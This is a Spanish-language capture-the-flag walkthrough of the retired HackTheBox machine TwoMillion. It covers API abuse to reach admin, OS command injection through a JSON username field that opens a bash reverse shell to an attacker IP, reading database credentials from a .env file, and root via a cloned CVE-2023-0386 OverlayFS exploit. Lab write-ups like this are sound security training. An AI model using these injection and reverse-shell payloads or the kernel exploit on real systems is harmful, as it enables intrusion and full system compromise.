
Informe de la máquina TwoMillion de HackTheBox — abuso de API, inyección de comandos y CVE-2023-0386
Writeup de la máquina TwoMillion de HackTheBox — Abuso de API, inyección de comandos y CVE-2023-0386
| Campo | Detalles |
|---|---|
| Nombre | TwoMillion |
| Dificultad | Fácil |
| SO | Linux |
| IP | 10.10.11.221 |
| CVE | CVE-2023-0386 |
TwoMillion es una máquina Linux de dificultad Fácil ambientada en la antigua plataforma HackTheBox. Implica decodificar un código de invitación, abusar de endpoints de API, inyección de comandos en el SO, descubrimiento de credenciales y una escalada de privilegios del kernel de Linux mediante CVE-2023-0386 (OverlayFS).
nmap -sV -sC -v 10.10.11.221
Puertos abiertos:
2million.htbAgregar a /etc/hosts:
echo "10.10.11.221 2million.htb" >> /etc/hosts
curl -X POST http://2million.htb/api/v1/invite/how/to/generate
La respuesta está codificada en ROT13. Decodifícala:
echo "Va beqre gb trarengr..." | tr 'A-Za-z' 'N-ZA-Mn-za-m'
Genera el código de invitación:
curl -X POST http://2million.htb/api/v1/invite/generate
echo "BASE64==" | base64 -d
Regístrate en http://2million.htb/register usando el código de invitación decodificado.
Inicia sesión en el navegador, obtén PHPSESSID de las cookies (F12 → Aplicación → Cookies).
Escala a administrador:
curl -X PUT http://2million.htb/api/v1/admin/settings/update \
-b "PHPSESSID=<your_session>" \
-H "Content-Type: application/json" \
--data '{"email":"[email protected]","is_admin":1}'
Verifica:
curl -b "PHPSESSID=<your_session>" http://2million.htb/api/v1/admin/auth
# {"message":true}
Inicia el listener:
nc -lvnp 4444
Envía el payload de reverse shell:
curl -s -X POST http://2million.htb/api/v1/admin/vpn/generate \
-b "PHPSESSID=<your_session>" \
-H "Content-Type: application/json" \
--data '{"username":"test;bash -c '"'"'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"'"' #"}'
Shell recibida como www-data.
Encuentra credenciales en .env:
cat /var/www/html/.env
# DB_USERNAME=admin
# DB_PASSWORD=SuperDuperPass123
Accede por SSH:
ssh [email protected]
cat ~/user.txt
Revisa la pista:
cat /var/mail/admin
uname -r
# 5.15.70 — vulnerable a CVE-2023-0386
Descarga y compila el exploit en Kali:
git clone https://github.com/xkaneiki/CVE-2023-0386
cd CVE-2023-0386
make all
Transfiere al objetivo:
# Kali
python3 -m http.server 8000
# Objetivo
wget http://YOUR_IP:8000/exploit.zip
unzip exploit.zip
make all
Ejecuta en dos terminales en el objetivo:
Terminal 1:
./fuse ./ovlcap/lower ./gc
Terminal 2:
./exp
Obtén la flag de root:
cat /root/root.txt
Este writeup es solo con fines educativos en una máquina retirada de HackTheBox.
| Paso | Técnica |
|---|
| Reconocimiento | Escaneo Nmap |
| Código de invitación | Decodificación ROT13 + Base64 |
| Escalada web | Manipulación de API → administrador |
| Shell inicial | Inyección de comandos en el SO |
| Movimiento lateral | Credenciales .env → SSH |
| Root | Exploit CVE-2023-0386 OverlayFS |